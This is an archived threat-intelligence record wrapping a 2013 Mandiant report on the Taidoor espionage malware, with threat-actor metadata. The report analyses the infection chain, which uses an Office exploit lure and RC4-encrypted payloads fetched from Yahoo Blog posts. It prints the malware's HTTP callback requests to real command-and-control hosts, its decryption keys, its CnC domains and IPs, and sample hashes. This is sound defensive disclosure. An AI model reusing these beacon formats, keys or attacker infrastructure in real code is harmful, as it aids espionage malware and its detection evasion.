{
	"id": "9888072d-94a7-4cc7-9589-6cd2c5872d72",
	"created_at": "2026-04-06T00:16:17.645289Z",
	"updated_at": "2026-04-10T13:11:52.193651Z",
	"deleted_at": null,
	"sha1_hash": "377e9928f860f55d873ff6276e6d406860c202a2",
	"title": "Evasive Tactics: Taidoor | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1689955,
	"plain_text": "Evasive Tactics: Taidoor | Mandiant\r\nBy Mandiant\r\nPublished: 2013-09-06 · Archived: 2026-04-02 11:28:22 UTC\r\nWritten by: Nart Villeneuve, Thoufique Haq, Ned Moran\r\nThe Taidoor malware has been used in many ongoing cyber espionage campaigns. Its victims include government\r\nagencies, corporate entities, and think tanks, especially those with interests in Taiwan. [1] In a typical attack,\r\ntargets receive a spear-phishing email which encourages them to open an attached file. If opened on a vulnerable\r\nsystem, malware is silently installed on the target’s computer while a decoy document with legitimate content is\r\nopened that is intended to alleviate any suspicions the target may have. Taidoor has been successfully\r\ncompromising targets since 2008, and continues to be active today.\r\nDespite being around for a long time – and quite well known – Taidoor is a constantly evolving, persistent threat.\r\nWe observed significant tactical changes in 2011 and 2012, when the malicious email attachments did not drop the\r\nTaidoor malware directly, but instead dropped a “downloader” that then grabbed the traditional Taidoor malware\r\nfrom the Internet. [2]\r\nRecently, we observed a new variant of Taidoor, which was used in targeted attacks. It has evolved in two ways.\r\nInstead of downloading the traditional Taidoor malware from a command-and-control (CnC) server, the\r\n“downloader” reaches out to Yahoo Blogs and retrieves encrypted text from blog posts. When decrypted by the\r\n“downloader”, this text is actually a modified version of the traditional Taidoor malware. This new version of\r\nTaidoor maintains similar behavior, but has been changed enough to avoid common network detection signatures.\r\nTraditional Taidoor Malware\r\nThe Taidoor malware is traditionally delivered as an email attachment. If opened, the Taidoor malware is dropped\r\nonto the target’s system, and starts to beacon to a CnC server. 
Taidoor connects to its CnCs using HTTP, and the\r\n“GET” request has been consistent since 2008. It follows a simple pattern:\r\nGET /[5 characters].php?id=[6 numbers][12 characters/numbers]\r\nThe last set of 12 characters is actually the encrypted MAC address of the compromised computer. The values of\r\nthe MAC address are incremented by 1, and this is used as an RC4 key to encrypt the data that is passed between\r\nthe compromised computer and its CnC server.\r\nThe New Taidoor\r\nIn the past, other APT campaigns have used blog hosting platforms as a mechanism to transmit CnC server\r\ninformation to compromised targets. [3] Attackers using Taidoor have leveraged this model as well.\r\nhttps://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nPage 1 of 8\n\nWe analyzed a sample (be1d972819e0c5bf80bf1691cc563400) that when opened exploits a vulnerability in\r\nMicrosoft Office (CVE-2012-0158) to drop malware on the target’s computer.\r\nThe decoy document contains background information on trade liberalization between the People’s Republic of\r\nChina (PRC) and Taiwan.\r\nThe various strings in the file are XOR-encoded with the key \"0x02\" or \"0x03\".\r\nThis malware is a simple “downloader” that, instead of connecting to a CnC server, connects to a Yahoo Blog and\r\ndownloads the contents of a blog post.\r\nGET /jw!JRkdqkKGAh6MPj9MlwbK6iMgScE- HTTP/1.1\r\nAccept: /\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET\r\nCLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)\r\nAccept-Encoding: gzip, deflate\r\nHost: tw.myblog.yahoo.com\r\nConnection: Keep-Alive\r\nThe content of the blog post between the markers “ctxugfbyyxyyyxyy” and “yxyyyxyyctxugfby” is encoded with\r\nbase64 and encrypted using the RC4 cipher. 
The encryption key, which we discovered to be \"asdfasdf\", is also\r\npresent in the contents of the base64 blog data in an encrypted form. The decrypted content of the blog post is a\r\nDLL file – that is in fact the Taidoor malware.\r\nAfter the first-stage dropper downloads and decrypts the Taidoor malware, it then begins to connect to two CnC\r\nservers: roudan.serveftp.com (69.95.218.31) and mac.gov.hpc.tw (120.50.40.145). However, the network traffic\r\n(its “callback”) has been modified from the traditional version.\r\nGET /default.jsp?vx=vsutnh191138F9744C HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET\r\nCLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nHost: mac.gov.hpc.tw:443\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nRather than having “[five characters].php”, this new file path ends in “.jsp” and may have any of the following file\r\nnames:\r\nprocess\r\npage\r\ndefault\r\nindex\r\nuser\r\nparse\r\nabout\r\nsecurity\r\nquery\r\nlogin\r\nThe new format is:\r\n/[file name].jsp?[2 random characters]=[6 random characters][encrypted MAC address]\r\nIn addition to the use of other malicious Word documents (b0fd4d5fb6d8acb1ccfb54d53c08f11f), we have also\r\nseen this new Taidoor variant distributed as a Windows ScreenSaver file (.scr) posing as a PDF\r\n(d9940a3da42eb2bb8e19a84235d86e91) or a Word document (c4de3fea790f8ff6452016db5d7aa33f).\r\nIt remains unclear whether all of this Taidoor activity is related or different groups are using the same malware for\r\ndifferent purposes. 
The fact that Taidoor is not off-the-shelf malware that can simply be downloaded or purchased\r\nin the cybercrime underground suggests that all of this activity may be connected in some way.\r\nSo far, we have found only one large cluster of activity associated with this new Taidoor variant. This cluster,\r\nwhich made use of Yahoo Blogs, appears to have targeted entities in Taiwan. We found that traditional versions of\r\nTaidoor have also been using this infrastructure. [4]\r\nMalware Connections\r\nWe found that another, possibly related, malware family known as “Taleret” is using the same technique that this\r\nTaidoor variant has used. We found that samples (such as 6cd1bf0e8adcc7208b82e1506efdba8d,\r\n525fd346b9511a84bbe26eb47b845d89 and 5c887a31fb4713e17c5dda9d78aab9fe) connect to Yahoo Blogs in\r\norder to retrieve a list of CnC servers.\r\nThe content between the two markers “XXXXX” is encoded with base64 and encrypted with the RC4 cipher. The\r\nencryption key is “c37f12a0” in hex, and hardcoded in the malware.\r\nWe extracted the following CnC servers from these blog posts:\r\nopp.gov.taiwans.tw\r\nnscnet.gov.medicare.tw\r\nmac.gov.skies.tw\r\nklserver.servehttp.com\r\nkllserver.serveftp.com\r\n202.142.153.154\r\n80.149.239.139\r\n202.142.172.131\r\nwww.facebook.trickip.NET\r\nwww.braintrust.AlmostMy.COM\r\nAs with Taidoor, there appears to be a frequent association with Taiwan, in addition to a similar CnC naming\r\nscheme – such as mac.gov.hpc.tw (Taidoor) and mac.gov.skies.tw (Taleret).\r\nConclusion\r\nThe Taidoor malware has been used to successfully compromise targets since 2008. 
This threat has evolved over\r\ntime, and has recently leveraged Yahoo Blogs as a mechanism to drop the Taidoor malware as a “second stage”\r\ncomponent. In addition, the well-known Taidoor network traffic pattern has been modified, likely as a new way to\r\navoid network-based detection.\r\nNotes\r\n1. http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_taidoor-targeting_think_tanks.pdf\r\n2. http://blog.trendmicro.com/trendlabs-security-intelligence/taidoor-update-taidoor-gang-tags-its-victims/\r\nand http://about-threats.trendmicro.com/us/spam/222/A%20Malware%20Treat%20this%20Halloween\r\n3. http://www.nartv.org/mirror/shadows-in-the-cloud.pdf and reports of associated malware here\r\nhttp://www.welivesecurity.com/2013/05/23/syndicasec-in-the-sin-bin/ and here\r\nhttp://www.cybersquared.com/apt_targetedattacks_within_socialmedia/\r\n4. MD5 hashes of traditional Taidoor samples 811aae1a66f6a2722849333293cbf9cd\r\n454c9960e89d02e4922245efb8ef6b49 5efc35315e87fdc67dada06fb700a8c7\r\nbc69a262bcd418d194ce2aac7da47286\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html"
	],
	"report_names": [
		"evasive-tactics-taidoor-3.html"
	],
	"threat_actors": [
		{
			"id": "71b19e59-b5f7-4bc6-816d-194be0f02af0",
			"created_at": "2022-10-25T16:07:24.301036Z",
			"updated_at": "2026-04-10T02:00:04.928222Z",
			"deleted_at": null,
			"main_name": "Taidoor",
			"aliases": [
				"Budminer",
				"Earth Aughisky",
				"G0015"
			],
			"source_name": "ETDA:Taidoor",
			"tools": [
				"Dripion",
				"Masson",
				"Taidoor",
				"simbot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "50bd4a6c-7542-4bdd-8b37-ab468fc428ef",
			"created_at": "2023-01-06T13:46:38.998658Z",
			"updated_at": "2026-04-10T02:00:03.176186Z",
			"deleted_at": null,
			"main_name": "Taidoor",
			"aliases": [
				"G0015",
				"Earth Aughisky"
			],
			"source_name": "MISPGALAXY:Taidoor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "478e9b27-39b9-49e4-a3c5-81569a767275",
			"created_at": "2022-10-25T15:50:23.417339Z",
			"updated_at": "2026-04-10T02:00:05.41593Z",
			"deleted_at": null,
			"main_name": "Taidoor",
			"aliases": [
				"Taidoor"
			],
			"source_name": "MITRE:Taidoor",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434577,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/377e9928f860f55d873ff6276e6d406860c202a2.pdf",
		"text": "https://archive.orkl.eu/377e9928f860f55d873ff6276e6d406860c202a2.txt",
		"img": "https://archive.orkl.eu/377e9928f860f55d873ff6276e6d406860c202a2.jpg"
	}
}